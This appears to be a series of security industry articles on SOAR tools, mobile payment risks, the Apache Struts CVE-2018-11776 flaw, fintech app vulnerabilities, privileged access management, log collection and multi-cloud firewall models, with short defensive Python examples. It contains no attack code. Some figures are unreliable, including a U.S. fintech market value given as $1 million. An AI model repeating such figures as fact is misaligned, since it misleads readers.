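With store-side signing, by contrast, whatever reaches the store gets signed — so a compromised developer account is enough to ship a "validly signed" trojan.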
The company hasn’t provided details on how the Chrome webstore account was compromised but is investigating the incident.
In a recent report, Gartner predicted that SOAR adoption rates will rise from 1% to 15% by 2020. These findings highlight two key factors. Firstly, acceptable SOAR protocols are currently lacking in most corporations. Secondly, SOAR tools are gaining in traction and popularity as market validation occurs. The anticipated leap to 15% adoption in under two years is evidence of this.
SOAR tools are quickly emerging and will have a major impact on business.
What Exactly is SOAR?
The purpose of Security Orchestration, Automation, and Response (SOAR) tools is to allow companies to mitigate rising security threats quickly. Adopting SOAR tools will ensure that corporations are better prepared to identify and isolate potential threats before they become a serious issue. SOAR tools allow companies to be proactive as well as reactive in the fight against cybercrime.
Gartner defines SOAR as technologies that allow companies to collect all types of security threats, alerts, and data from various sources and analyze and respond to them in one place. Using SOAR tools, organizations can identify and eliminate duplicates and false positives, which allows security analysts to focus on real threats most efficiently. By leveraging human expertise and the time savings afforded by automation and orchestration, decision-making and reaction times can be significantly faster.
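The deduplication step described above can be sketched in a few lines. This is a minimal, hypothetical illustration — the field names and the fold-in logic are assumptions for the example, not any specific vendor's API:

```python
def fingerprint(alert: dict) -> tuple:
    # Collapse alerts that describe the same underlying event.
    # Which fields make up the fingerprint is configurable in real SOAR tools.
    return (alert["source"], alert["rule"], alert["host"])

def deduplicate(alerts: list) -> list:
    """Fold duplicate alerts into one record, keeping a count for analysts."""
    seen = {}
    for alert in alerts:
        key = fingerprint(alert)
        if key in seen:
            seen[key]["count"] += 1   # duplicate: bump the count, don't re-alert
        else:
            seen[key] = {**alert, "count": 1}
    return list(seen.values())

alerts = [
    {"source": "ids", "rule": "port-scan", "host": "10.0.0.5"},
    {"source": "ids", "rule": "port-scan", "host": "10.0.0.5"},
    {"source": "av",  "rule": "trojan",    "host": "10.0.0.9"},
]
unique = deduplicate(alerts)
assert len(unique) == 2          # two distinct events survive
assert unique[0]["count"] == 2   # the duplicate was folded in
```

The point is the shape of the workflow: analysts see two actionable items instead of three raw alerts, and the count preserved on the folded alert still signals recurrence.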
One of the main challenges in the cybersecurity industry today is detection of cyber threats. Dwell times are currently estimated to average six months. This means that malware and other malicious code can be entrenched in a company’s ecosystem, gathering information long before the unthinkable happens. Speed is of the essence when it comes to combating bad actors. SOAR tools allow companies to clearly define incident management and response as well as implement these processes at scale.
Why SOAR and Why Now?
Cybercrime is a pressing and rising problem, costing the global economy an estimated $450 billion a year. As new technologies evolve to fight cyber criminals, so too do the tactics and agility of the perpetrators. The average company is simply unprepared to deal with this impending threat. Building a larger firewall will only cause the attacker to go out and look for a longer metaphorical ladder.
One only has to look at disastrous high profile cases like Equifax to see the implications of major hacking attacks. As attackers become better at finding new methods of cracking passwords or breaking firewalls, traditional security technologies are being left in the dust. Worse still, many security operations rely primarily on manually created documentation and outdated protocols, tools, and processes. Security teams that are ramping up investments against cybercrime are often dispersed and disorganized. They have a plethora of tools at their fingertips, but no cohesive way of using them to effectively eradicate the threat.
SOAR is proving to be a vital way of giving security professionals a roadmap to predict, prevent, and tackle threats effectively. Orchestration provides a vital conduit to unify security tools and their actions in common windows, automation allows repetitive tasks to be executed at machine speed, and incident management provides full visibility across the attack lifecycle.
SOAR Market Validation
Market validation is beginning to occur as SOAR tools are being increasingly adopted by key players. Microsoft's acquisition of Hexadite, Splunk's acquisition of Phantom, and IBM taking over Resilient Systems will help to speed up widespread adoption of SOAR as companies large and small follow in their footsteps.
Moreover, as more security organizations are faced with the challenges of limited resources and a lack of talent in cyberspace, there is a growing need to harness technology to automate and streamline workflows. Not only will SOAR tools help to resolve the talent gap, but their adoption will also reduce costs and expedite response.
If corporations around the globe keep dragging their heels in the fight against cybercrime, they run the risk of losing money and suffering reputational damage. SOAR tools allow for an effective way of fighting security threats through a central collection of intelligence that can be quickly transformed into action.
As has been showcased by multiple public data breaches and filled column inches, security threats are omnipresent. Organizing an efficient response through sophisticated tools that scale companies’ resources, improve response times, and automate mundane security tasks will be vital to thwart attackers.
About the author: Rishi Bhargava is a co-founder of Demisto. A creative thinker and problem solver, Rishi has been building and managing successful enterprise products for many years. Making things “simple” is really hard. Rishi believes simplicity in every aspect will delight Demisto customers and has made it the company’s guiding principle.
There are more ways to pay for goods and services than ever before. New payment technologies bring growth opportunities for businesses, and they can revolutionize customer experiences at point-of-sale.
However, these new apps and technologies also present payment providers with new types of threats. In order to provide high-security experiences for users, security must be built into these new apps and technologies from the ground up. But there’s reason to believe that ship may have sailed.
The very architecture and developer languages chosen for the latest crop of mobile financial apps and payment solutions like Tap-To-Pay and Pin-On-Glass haven’t necessarily been chosen with security in mind. Therefore, they may have fundamental, systemic vulnerabilities open to compromise.
As smart payment technologies rose to prominence, simple mag stripe readers with virtually no security were ubiquitous among businesses for whom larger PEDs were cost-prohibitive. Luckily, more secure options have come to market since the EMV migration began in the United States. These options, such as downloadable mPOS and PIN-on-COTS, bring more security than a simple mag stripe reader, but not nearly enough to meet a financial institution’s standards.
In the past, a payment terminal was a standards-compliant, extensively-researched and secured hardware device that was purpose-built for processing secure transactions. Now, any device with the necessary features can become a payment terminal. Additionally, that device handles all of the transaction processing. Naturally, these changes prompt security challenges.
Tap-To-Pay systems present a particularly novel protection trial; not only are these devices often owned and maintained by non-tech-savvy end users, but they serve numerous purposes each day. One minute a user is playing Candy Crush, and the next they’re executing and processing transactions to and from the world’s largest financial institutions—all on the same pane of glass. Historically, payment systems have segregated the transaction itself from the card’s credentials, but this is no longer the case, presenting a new structural vulnerability for fraud.
Since a smartphone manages onboarding, account authentication, cryptographic processing, and secure communication with all involved parties, the security of the device itself is of primary importance. Yet it is well known that jailbroken and rooted devices exist around the world and are easily masked from detection on a network. Payment apps must cope with this reality and keep data safe even on compromised devices, so the architecture used to build these applications becomes crucially important. Some apps are offered only on certain platforms for this reason, and others are certified to meet certain standards of protection. App developers must assess platforms for their architecture and security capabilities to best protect sensitive financial data. Even root detection, an application’s ability to identify whether the device it runs on is more susceptible to intrusion, depends on an outdated blacklist/whitelist approach and, therefore, on knowledge of prior attacks.
So what can a developer do to secure users’ data in transit, in storage, and in use? First, cryptographic operations must run in a protected environment. The app’s code also needs to be protected from analysis, both static and dynamic. Furthermore, secure and authenticated access must be ensured.
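As a small sketch of the data-in-storage point: an app should never keep a credential in recoverable form. The following illustrates one standard approach — a slow, salted key-derivation function — using only Python's standard library. The iteration count and salt size here are illustrative choices, not a recommendation for any specific platform:

```python
import hashlib
import hmac
import os

def hash_credential(password: str, salt=None):
    """Derive a slow, salted hash so a stolen data store doesn't yield passwords."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest

def verify_credential(password: str, salt: bytes, stored: bytes) -> bool:
    # Re-derive with the stored salt and compare in constant time.
    _, candidate = hash_credential(password, salt)
    return hmac.compare_digest(candidate, stored)

salt, stored = hash_credential("correct horse battery staple")
assert verify_credential("correct horse battery staple", salt, stored)
assert not verify_credential("wrong guess", salt, stored)
```

On a mobile device the derived key and salt would additionally live in hardware-backed storage (Keystore/Secure Enclave) where the platform offers it — the protected environment the paragraph above calls for.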
Mobile devices are the most effective hacking tools available today. Used by billions and sharing standardized characteristics, smartphones aren’t able to be protected with traditional IT security techniques. Since operating systems can’t be trusted, the most notable control a developer has is over the app itself. That’s where security really begins.
About the author: Simon Blake-Wilson is Chief Operating Officer at Inside Secure, a global provider of security solutions for mobile and connected devices. He co-authored the book Digital Signatures: Security and Controls, and edited several ANSI standards on Elliptic Curve Cryptography which have been adopted by the US government.
About a week ago, a security researcher disclosed a critical remote code execution vulnerability in the Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. The vulnerability (CVE-2018-11776) affects all supported versions of Struts 2 and was patched by the Apache Software Foundation on Aug. 22. Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are already working on exploits.
More critical than the Equifax vulnerability
“On the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,” Man Yue Mo, the researcher who uncovered the flaw, told the media, referring to CVE-2017-9805. CVE-2017-9805 was announced the same day (September 7, 2017) that Equifax announced the massive data breach via CVE-2017-5638, which led to the lifting of personal details of over 148 million consumers.
Struts, an open source framework for developing web applications, is widely used by enterprises worldwide, including Fortune 100 companies like Lockheed Martin and Virgin Atlantic, as well as the U.S. Internal Revenue Service.
In 2017, the Equifax credit reporting agency used Struts in an online portal, and because Equifax did not identify and patch a vulnerable version of Struts, attackers were able to capture personal consumer information such as names, Social Security numbers, birth dates, and addresses of over 148 million U.S. consumers, nearly 700,000 U.K. residents, and more than 19,000 Canadian customers.
I spoke to Black Duck by Synopsys technical evangelist Tim Mackey about the newly discovered Struts vulnerability. “Modern software is increasingly complex, and identifying how data passes through it should be a priority for all software development teams,” Tim noted. “To give you some background, developers commonly use libraries of code, or development paradigms which have proven efficient, when creating new applications or features. This attribute is a positive when the library or paradigm is of high quality, but when a security defect is uncovered, this same attribute often leads to a pattern of security issues.
“In the case of CVE-2018-11776,” Tim continued, “the root cause was a lack of input validation on the URL passed to the Struts framework. In both 2016 and 2017, the Apache Struts community disclosed a series of remote code execution vulnerabilities. These vulnerabilities all related to the improper handling of unvalidated data. However, unlike CVE-2018-11776, the prior vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors.
“CVE-2018-11776, on the other hand, operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself but the various libraries used by Struts. It is this level of understanding which is of greatest concern—and this concern relates to any library framework. Validating the input to a function requires a clear definition of what is acceptable. It equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it’s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued, as it’s unrealistic to assume that all patches are free from behavioral changes.”
Shortly after the Apache Software Foundation released its patch, a proof-of-concept exploit of the vulnerability was posted on GitHub. The PoC included a Python script that allows for easy exploitation. The firm that discovered the PoC, threat intelligence company Recorded Future, also said that it has spotted chatter on underground forums revolving around the flaw’s exploitation. Companies not wanting to become the next Equifax should immediately identify what version of Apache Struts they have in use and where, and apply the patch as needed.
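That last step — identify the Struts version in use, then patch as needed — reduces to a version comparison against the fixed releases named in the advisory (2.3.35 for the 2.3 line, 2.5.17 for 2.5). A minimal sketch, assuming plain dotted version strings as input:

```python
def parse_version(v: str) -> tuple:
    """Turn '2.3.34' into (2, 3, 34) so tuples compare numerically."""
    return tuple(int(part) for part in v.split("."))

# First fixed release on each supported branch, per the Apache advisory.
FIXED = {(2, 3): (2, 3, 35), (2, 5): (2, 5, 17)}

def is_vulnerable(version: str) -> bool:
    v = parse_version(version)
    fixed = FIXED.get(v[:2])
    if fixed is None:
        return False  # unrecognized branch: flag for manual review in practice
    return v < fixed

assert is_vulnerable("2.3.34")
assert not is_vulnerable("2.3.35")
assert is_vulnerable("2.5.16")
assert not is_vulnerable("2.5.17")
```

The harder part in a large enterprise is the "identify where" half: Struts is often a transitive dependency, which is exactly why the software-composition analysis Tim Mackey describes matters.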
About the author: Fred Bals is a corporate storyteller for Black Duck by Synopsys, focused on providing insights that help security, risk, legal, DevOps, and M&A teams better understand open source security and license risks. Fred is a researcher for the Synopsys Center for Open Source Research & Innovation, and co-author of the 2018 Open Source and Risk Analysis report.
Whether it’s paying bills, transferring money, reviewing account balances or even trading stocks, consumers increasingly rely on mobile banking apps from their device, whether it’s a mobile phone or tablet or the smart watch on their wrist. The growth and popularity of fintech or financial technology is spreading rapidly.
A recent market research study found that consumer mobile banking usage increased by almost 50 percent within the past year. According to Statista, the transactional value of the U.S. fintech market in 2018 was more than $1 million.
Mobile banking is undeniably convenient, but are the apps that handle our money 100% secure?
The unfortunate reality is that almost all apps are susceptible to hacking attacks and when damages occur in the financial services industry, the results can severely affect not only the targeted institution, but unlucky consumers as well.
To understand the current security state of fintech apps, researchers at SEWORKS downloaded and analyzed the top 20 free Android finance apps on Google Play in popular categories such as mobile banking, payments, investments, budgeting, trading, credit and expense tracking and other financial categories.
What we discovered, unfortunately, was not unexpected.
Analyzing top Android mobile banking apps
SEWORKS researchers employed both dynamic and static testing methods to conduct detailed analysis of app vulnerabilities, including while the apps run.
All of the finance apps had properly secured native libraries and data encryption, which is a positive sign that companies care about adding security measures and protecting the data and users.
However, our analysis uncovered five critical and medium vulnerabilities in the free Android finance apps on Google Play:
- 100%: File input/output or I/O. Level – critical. Data transfer to or from the application file system can serve as an entry attack point, such as when financial statements or tax forms are downloaded or budgets updated. Malicious code injected into the app can allow malicious attackers access to resources such as users’ account numbers, passwords or routing numbers. Hacking attacks via file I/O can be executed internally and/or by using network behaviors to activate a backdoor with a connected network.
- 100%: Network behaviors. Level – medium. Hackers can potentially exploit vulnerabilities within server-client communication, such as when users access account balances, transfer funds, or perform other activities. For example, a man-in-the-middle (MITM) attack, where the attacker secretly relays and possibly alters the communication, can occur if an app’s authentication protocols and certificate pinning are implemented incorrectly.
- 100%: Code tampering. Level – medium. Listed as one of the Open Web Application Security Project (OWASP) Mobile Security Project’s Top 10 Risks, it is considered one of the most common app vulnerabilities and one of the easiest to manipulate. By changing or replacing code, an application can be exploited for various types of attacks, such as inserting malware or phishing.
- 30%: Secure Sockets Layer (SSL). Level – critical. Vulnerabilities related to a broken, or improperly established and encrypted, link between server and client could leave sensitive financial data exposed.
- 5%: DEX file exposure. Level – critical. A relatively small number of the apps had vulnerabilities related to the Dalvik Executable (.dex) file containing the app’s Java bytecode. Code decompiled to expose the original source could lead to malicious hacking attacks, such as piracy and malware injection.
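The MITM risk called out under network behaviors is exactly what certificate pinning defends against. Below is a minimal, offline sketch of the pinning comparison itself; the byte strings are stand-ins, and in a real client the presented certificate would come from `ssl.SSLSocket.getpeercert(binary_form=True)`:

```python
import hashlib
import hmac

def cert_fingerprint(cert_der: bytes) -> str:
    """SHA-256 fingerprint of a certificate in DER form."""
    return hashlib.sha256(cert_der).hexdigest()

def pin_matches(cert_der: bytes, pinned: str) -> bool:
    # Constant-time comparison: the connection is trusted only if the
    # presented certificate matches the fingerprint the app shipped with.
    return hmac.compare_digest(cert_fingerprint(cert_der), pinned)

shipped_cert = b"-----hypothetical DER bytes of the bank's certificate-----"
PINNED = cert_fingerprint(shipped_cert)  # baked into the app at build time

assert pin_matches(shipped_cert, PINNED)
assert not pin_matches(b"certificate presented by a MITM proxy", PINNED)
```

Pinning the leaf certificate (as sketched here) is the strictest option; pinning an intermediate CA or the public key instead trades some strictness for easier certificate rotation.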
The result of our analysis of mobile banking apps is similar to what we’ve uncovered in the m-commerce and fitness markets – all apps are subject to hacking attacks.
All of the finance apps we studied had at least one critical vulnerability, as well as medium and low security risks. We recommend adding security starting from the app development phase and testing often to ensure the app security status is up to date. It is also important to encourage the infosec team to maintain security protocols. Certainly, apps that handle our finances must have a comprehensive level of security.
About the author: Min-Pyo Hong has advised corporations, NGOs, and governments on digital security issues for over 20 years, and led a team of five-time finalists at Defcon. Hong is currently founder and CEO of Seworks, a San Francisco-based developer of advanced security solutions for the mobile era.
The growing need to secure the “keys to the kingdom” and the steps organizations need to take to protect their critical credentials
The constantly evolving threat landscape continues to bring organizations — even of enterprise size — to their knees by means of massive data theft. Billions of records are stolen each year, identity theft is rising and the financial fraud market is expanding.
These consequential concerns turn executives’ stomachs, resulting in increasing involvement from business leaders in cybersecurity. The fear of breaches, climbing costs and restrictive requirements to meet compliance standards and maintain security are major hindrances to these organizations. They need a solution to address these problems.
It is broke, and it’s time to fix it
Traditional cybersecurity strategies are no longer sustainable. Old products and methods are too complex, challenging to integrate, usually difficult to manage and cost organizations too much time and money. These organizations have little choice but to progress to simpler solutions that alleviate complicated protocols for IT teams and offer seamless integration while constructing a more secure defense system.
Privileged access security has become one of the top IT concerns: many Chief Security Officers (CSOs) and Chief Information Security Officers (CISOs) are prioritizing it to greatly reduce the risk of cyberattacks by protecting their organizations from unauthorized access. Gartner recently released a report naming Privileged Access Management the No. 1 security project to implement in 2018.
One of the most common and yet daunting challenges for CSOs and CISOs is figuring out where to begin — where to first focus resources, how much funding to allocate, etc. The initial action should be to secure critical credentials, shutting down a go-to attack vector for hackers.
Organizations should start by evaluating their privileged accounts and determining what privileged access means to them. Since each company is different, it is important to map out which important business functions rely on data, systems and access. A recommended approach would be to reuse your disaster recovery plan, which typically classifies the important systems that need to be recovered or addressed first, and identify the privileged accounts for those systems.
Generally, privileged access includes permissions for critical infrastructure, sensitive data, configuring systems, patch deployment, vulnerability scans, and more. To create a comprehensive and specific definition, each organization should perform a data impact assessment illustrating exactly what its most privileged accounts protect and which accounts access, or enable access to, sensitive data.
Privileged accounts are everywhere in the IT environment. They are the glue that connects vast information networks. Yet for most people they are invisible.
These accounts can be accessed and operated by humans or non-humans. Some privileged accounts are associated with individuals such as business users or network administrators. Some are application accounts used to run services and are not associated with a person’s unique identity.
Once a data impact assessment is complete, the next step toward a mature security strategy is to follow the Privileged Access Management Lifecycle to get you moving quickly on the path to protecting and securing privileged access.
Privileged Access Management Lifecycle
Just as with any security project that is designed and implemented to help protect critical information assets, managing and protecting privileged account access requires a continuous approach. Organizations need to employ an ongoing program to pair with an advanced deployed strategy. The following briefly details the Privileged Access Management Lifecycle model which provides a high-level roadmap for establishing a premium PAM program.
Define and classify privileged accounts. Once your organization has established its qualifications for privileged accounts, it needs to develop IT security policies that explicitly cover them. Many organizations still lack acceptable use guidelines for privileged access. Treat privileged accounts individually by clearly defining a privileged account and detailing acceptable use policies. Gain a working understanding of who has privileged account access, and when those accounts are used.
Discover your privileged accounts. Organizations should use automated PAM software to identify their privileged accounts and implement continuous discovery to prevent privileged account sprawl, identify potential insider abuse, and reveal outside threats. This helps ensure complete and continuous visibility of the privileged account landscape, which is crucial in combating cybersecurity threats.
Manage and protect privileged account passwords. Proactively supervise and control privileged account access with password protection software. Your solution should automatically discover and store privileged accounts; record individual privileged session activity; schedule password rotation; and audit password account activity in order to quickly detect and respond to malicious activity.
Limit IT admin access to these critical systems. Develop a least-privilege strategy so that privileges are only granted when required and approved. Enforce least privilege on endpoints by restricting end users to a standard user profile and automatically elevating their privileges only to run approved and trusted applications. For IT administrator privileged account users, you should control access and implement super user privilege management for Windows and UNIX systems to prevent attackers from running malicious applications, remote access tools, and commands. Proper PAM solutions offer least-privilege and application control to enable seamless elevation of approved, trusted and whitelisted applications while minimizing the risk of running unauthorized applications.
Monitor and record sessions for privileged account activity. Your PAM solution should be able to do this for your organization. This enforces proper behavior and helps avoid end-user errors because the activities are being supervised. If a breach does occur, monitored privileged account use also provides information to forensics teams to assist in identifying breach causes as well as provides intelligence toward reducing future risk exposure.
Detect usage and analyze behavior to comb for abnormalities. Gaining insights into privileged account access and user behavior is a top priority as 80 percent of breaches involve a compromised user or privileged account. Real-time visibility into the access and activity of these users will allow you to detect suspected account compromise and potential insider threats. Behavioral analytics use data to establish individual user baselines, such as user activity, password access, and time of access. This information is used to identify unusual or abnormal activity in order to predict threats and alert IT teams when they occur.
Respond to incidents effectively by preparing an incident response plan in the case of a privileged account compromise. When an account is breached, changing the password or disabling the account is dangerously ineffective. If penetrated and compromised by an outside attacker, the assailant(s) can install malware and even create their own privileged accounts. If a domain administrator account is taken over, you should assume that your entire Active Directory is vulnerable.
Review and audit privilege account activity. Repeatedly analyze privileged accounts use through audits and reports to identify unusual behavior that may indicate a breach or misuse. A proper solution’s automated reporting will help track the cause of any security incidents and comply with industry and government regulations. Auditing of privileged accounts will also provide cybersecurity metrics to show other executives quantified information to make better informed business decisions.
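The behavioral-analytics step above can be sketched with a toy baseline. The field names and the hours-of-day heuristic are illustrative assumptions; real products model many more signals (password access patterns, source hosts, command history) and weight them statistically:

```python
from collections import defaultdict

def build_baseline(events):
    """Record the hours of day at which each privileged account normally logs in."""
    baseline = defaultdict(set)
    for account, hour in events:
        baseline[account].add(hour)
    return baseline

def is_anomalous(account, hour, baseline):
    """Flag activity outside an account's established pattern."""
    usual = baseline.get(account, set())
    return bool(usual) and hour not in usual   # no baseline yet -> don't flag

# Hypothetical history: a database admin who works office hours.
history = [("dba-admin", 9), ("dba-admin", 10), ("dba-admin", 11)]
baseline = build_baseline(history)

assert not is_anomalous("dba-admin", 10, baseline)  # within usual hours
assert is_anomalous("dba-admin", 3, baseline)       # 3 a.m. login gets flagged
```

The flagged event would feed the alerting and incident-response steps above rather than blocking access outright, since an unusual hour alone is weak evidence of compromise.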
Protection Begins Now...
The formula for establishing PAM security requires an understanding of privileged accounts, adoption of a comprehensive approach (such as the Privileged Access Management Lifecycle model), adherence to compliance standards and a multifaceted solution that offers true protection for the “keys to the kingdom.”
About the author: Joseph Carson is a cyber security professional with more than 20 years’ experience in enterprise security & infrastructure. Currently, Carson is the Chief Security Scientist at Thycotic.
The most significant costs in security operations come from an unlikely source – missed opportunities caused by not collecting and organizing log data. In order to operate more efficiently, security operations need to collect more data to support not just detection but validation, impact analysis and response. Reviewing the data used in security operations shows that all data, not just security logs, are needed to operate efficiently.
In its 2018 Cost of a Data Breach Study, Ponemon states that the average total cost of a breach ranges from $2.2 million to $6.9 million, depending on how many records are compromised. And keep in mind, this is just the cost impact of a breach, without regard for numerous other security issues. Efficient security operations save millions for the average mid- to large-sized company.
Back in 2005, in a conference room on the outskirts of Paris, Peiter Zatko, better known as Mudge, was explaining to me what he called the Physics of the Internet. It wasn’t physics, but the unwritten rules of how the flows of people and processes behave on the Internet. My wife leaned over and told me he was babbling incoherently. I leaned back and told her, “It is brilliant.” At that moment, I was listening to the first person to try to apply user behavior analysis to security. He was babbling, grasping for any analogy to express his idea, and few understood its significance at the time.
I would follow Peiter on stage and speak about the scalability of detection analysis. I remember how awkward it was to quote Peiter while he sat in the audience. He had said the year before, “You will never pay me to review audit logs.” That is, the smartest people in cybersecurity are not doing the tedious work, as they are far too engaged with more interesting projects.
Since then, Peiter has continued on from one engaging project to the next, and I continue to stew over the efficiency of security operations. The problem is that with limited talent, how do we review all the logs correctly? The answer has always been training more people and reducing log sizes.
Here lies the greatest failure of operational security: less is not more; less really is less. Less data means less visibility: fewer alerts, less validation data, less information with which to assess impact, and less data with which to respond. Costs rise because events are missed, and additional resources are spent obtaining data elsewhere when an organization must detect and respond without adequate information. The cost of missed events and insufficient response data far outweighs the savings from collecting less.
We all know data is valuable. Facebook has built a business on that principle. At my company, we don’t consider ourselves trash collectors of log data, but the waste management team. We create value from all that trash.
All of us are literally surrounded by data in today’s world. And it’s useful in more ways than one would ever imagine. As we see companies collecting more and more data every day – and spending more money to understand it – we know the industry is finally coming to realize that all data is security data.
In the past, organizations, their IT departments, and especially their security vendors cherry-picked the data they considered significant for security threat management. The 1990s and early 2000s saw the rise of security information and event management (SIEM) tools, marketed as a way to gather and provide access to the data exposing vulnerabilities within an infrastructure. Although shifting perceptions fully will require more work, our modern understanding of what constitutes security data is completely different from when SIEMs reigned supreme. Back then, truly massive data logs were quite rare, and not everything collected was deemed important enough to keep, let alone analyze.
In those days, most organizations focused on prevention as the answer to scaling response. But as our understanding of security data evolves, it has become apparent that allowed traffic is the real issue.
When we enable full logging on a firewall, the logs mostly consist of allowed data flows—about 85%, given how firewalls handle UDP traffic. Blocked events are considered to be "completed," or already-addressed, events. As previous security breaches have demonstrated, successful attacks occur within allowed data flows, not blocked events. Organizations are beginning to understand this, and we see it reflected in the broadening definition of security data.
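The skew toward allowed traffic is easy to demonstrate. The sketch below (with made-up log records and illustrative field names, not any vendor's actual format) tallies firewall events by action and keeps only the allowed flows, since that is where successful attacks travel:

```python
from collections import Counter

# Hypothetical log records; field names are illustrative, not from any
# specific firewall vendor.
events = [
    {"action": "allow", "src": "10.0.0.5", "dst": "203.0.113.9", "port": 443},
    {"action": "allow", "src": "10.0.0.8", "dst": "198.51.100.2", "port": 53},
    {"action": "block", "src": "192.0.2.7", "dst": "10.0.0.5", "port": 23},
]

counts = Counter(e["action"] for e in events)

# Blocked events are already-handled outcomes; review effort belongs on
# the allowed flows.
to_review = [e for e in events if e["action"] == "allow"]

print(counts["allow"], counts["block"])  # 2 1
```

In a real deployment the allow-to-block ratio is far more lopsided than in this toy sample, which is exactly why discarding allowed flows discards most of the vision.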
Think about it: everything from the data an employee is accessing to their request to access that data can be considered security data… and that's just the beginning. Mobile data, social media data, location data, geographical data, utilities data: you name it, and it can profoundly impact an organization's security operations or even law enforcement.
In the days of handpicking data deemed important to security, the scope of relevant data was narrow and static. Now, as the internet expands into our countless devices, appliances and vehicles, we're entering an era where those standards don't exist and everything has its own naming scheme. This will need to change. Data created by developers' apps and programs isn't currently recognized as security data, yet it absolutely is. Even the data that your refrigerator or your phone or your camera wants to share with you: none of it is labeled as security data, but it all is.
Look at cameras on the street. Everyone is walking around with a camera in their pocket. There are ATM cameras, gas station cameras, hotel hallway cameras and FedEx cameras. Regardless of a camera's intended purpose, they all provide law enforcement with video footage that, together with GPS information and phone call metadata, is being used to solve crimes. When the device began generating data, it certainly never knew its eventual use.
Still, this paradigm shift isn't happening quickly enough. Report after report indicates that organizations don't trust their current security solutions to prevent attacks. As the number of successful cyberattacks increases, so do companies' costs. Any idea why? It's nearly always associated with the amount of data collected and the use of outdated solutions that weren't intended to store a day's worth of modern data collection, let alone a year's. Using a solution that's not designed for today's ongoing, huge scalability needs is akin to a chronic ailment that only gets worse, requiring increasingly expensive doctor visits that never seem to get you healthy.
Business is about efficiency. Business competition is harsh, and it doesn’t care if you buy name brand solutions. Companies that collect and understand their data efficiently will perform fewer downstream actions and spend less money.
About the author: Chris Jordan is CEO of College Park, Maryland-based Fluency (www.fluencysecurity.com), a pioneer in simplified log management and security analytics. Copyright 2010 Respective Author at Infosec Island
The modern public cloud landscape offers a world of possibilities. The major cloud services (Amazon Web Services [AWS], Azure and Google Cloud Platform [GCP]) provide robust solutions with an ever-growing list of services and features. Today, 81 percent of organizations leverage multiple cloud service providers (CSPs).
The reasons for adopting a multi-cloud strategy can vary: organizations may build disaster recovery (DR) sites on a different cloud platform or divide workloads according to the most suitable cloud services, and sometimes multi-cloud security is the product of mergers and acquisitions. No matter how or why multi-cloud was introduced, securing multiple cloud platforms is challenging.
Cloud vendors are in a race to close the gaps in capabilities among themselves as well as to create product differentiation that will attract and retain customers. Their security services are evolving rapidly to offer powerful functionality across different security areas, but they are doing so in a variety of ways. Some services may look similar, but minor differences can lead to security issues and misconfigurations. Let's explore some of the challenges that security organizations face with multi-cloud deployments.
Different vendors, different account models
The first challenge starts at the beginning – each cloud vendor provides a different account management model. Security organizations often need to map resources to owners of the relationship with the cloud vendor. To do this, they must understand the correct permissions model they need to apply. When heterogeneous CSPs are used, this task becomes even more challenging.
GCP is based on projects: any GCP resource must belong to a project, projects are placed in folders, and multi-level folder nesting is supported. AWS, by contrast, groups resources into accounts under an organization, while Azure places resources in resource groups inside subscriptions, which in turn sit under management groups.
While these different concepts are related, subtleties that can impact security still exist. To understand the resource hierarchy, it is important to understand which security model each platform applies.
Controlling security groups on different platforms
IT engineers have decades of experience with private networks. But while in the physical data center (DC) they control everything, from the wires all the way up to the application, in the cloud it is Amazon, Microsoft and Google that control the physical layer and provide the services that run on top of the virtual network. Routing models used by cloud platforms differ from those used in the DC, and different cloud platforms use different models. The network firewall from the DC is embedded into the cloud infrastructure as Security Groups (SGs), and there are some differences among the SGs.
The AWS SG includes inbound and outbound rules for traffic. These rules are permissive, so effectively they work as a whitelist. Users can attach multiple SGs to each Elastic Compute Cloud (EC2) instance (technically, to the Elastic Network Interface, or ENI), and the rules of each security group are effectively aggregated to create one set of rules. SGs can be applied to different entities, including instances or managed services such as load balancers.
Azure Network Security Groups (NSGs) and GCP firewall rules provide an experience closer to classic firewalls, holding lists of allow and deny rules. The order of the rules is significant; the highest-priority matching rule controls the decision to allow or deny traffic. Azure allows only a single NSG per network interface (NIC) or subnet, so NSGs can be applied either to subnets or to the NICs attached to VMs. GCP firewall rules are based on network tags, which allow attaching rules to assets such as a VM.
When building the network, it is critical to implement the right model. Setting the wrong rule priority in Azure can lead to traffic being accepted by mistake. Applying additional SGs to a VM in AWS can lead to accepting traffic that was denied by the original SG. Engineers who work primarily with AWS can mishandle the priority of deny rules and block access to a service (or, in other cases, expose the service to the Internet when it should not be). Configuring security requires the right mindset, and IT engineers shifting back and forth among different deployments can easily make mistakes.
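To make the difference concrete, here is a deliberately simplified sketch of the two evaluation models. The rule structures are hypothetical and ignore directions, protocols and CIDR ranges; the point is only the union-of-allows semantics versus priority-ordered allow/deny:

```python
def aws_sg_allows(packet, security_groups):
    """AWS model (simplified): rules from all attached SGs are aggregated,
    and every rule is permissive, so one match anywhere allows the packet."""
    return any(
        rule["port"] == packet["port"]
        for sg in security_groups
        for rule in sg
    )

def azure_nsg_decision(packet, rules):
    """Azure NSG model (simplified): rules are evaluated in priority order
    (lower number wins) and each rule can allow or deny."""
    for rule in sorted(rules, key=lambda r: r["priority"]):
        if rule["port"] == packet["port"]:
            return rule["action"]
    return "deny"  # implicit deny if nothing matches

packet = {"port": 22}

# Two SGs attached to one instance: the union allows SSH even though
# the first SG alone would not.
sg_a = [{"port": 443}]
sg_b = [{"port": 22}]
print(aws_sg_allows(packet, [sg_a, sg_b]))  # True

# In Azure, a higher-priority (lower-numbered) deny wins regardless of
# a later allow rule for the same port.
nsg = [
    {"priority": 100, "port": 22, "action": "deny"},
    {"priority": 200, "port": 22, "action": "allow"},
]
print(azure_nsg_decision(packet, nsg))  # deny
```

An engineer who carries the AWS mental model ("adding a rule can only open access") into Azure, or vice versa, makes exactly the mistakes described above.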
Virtual Networks in the cloud have different behavior
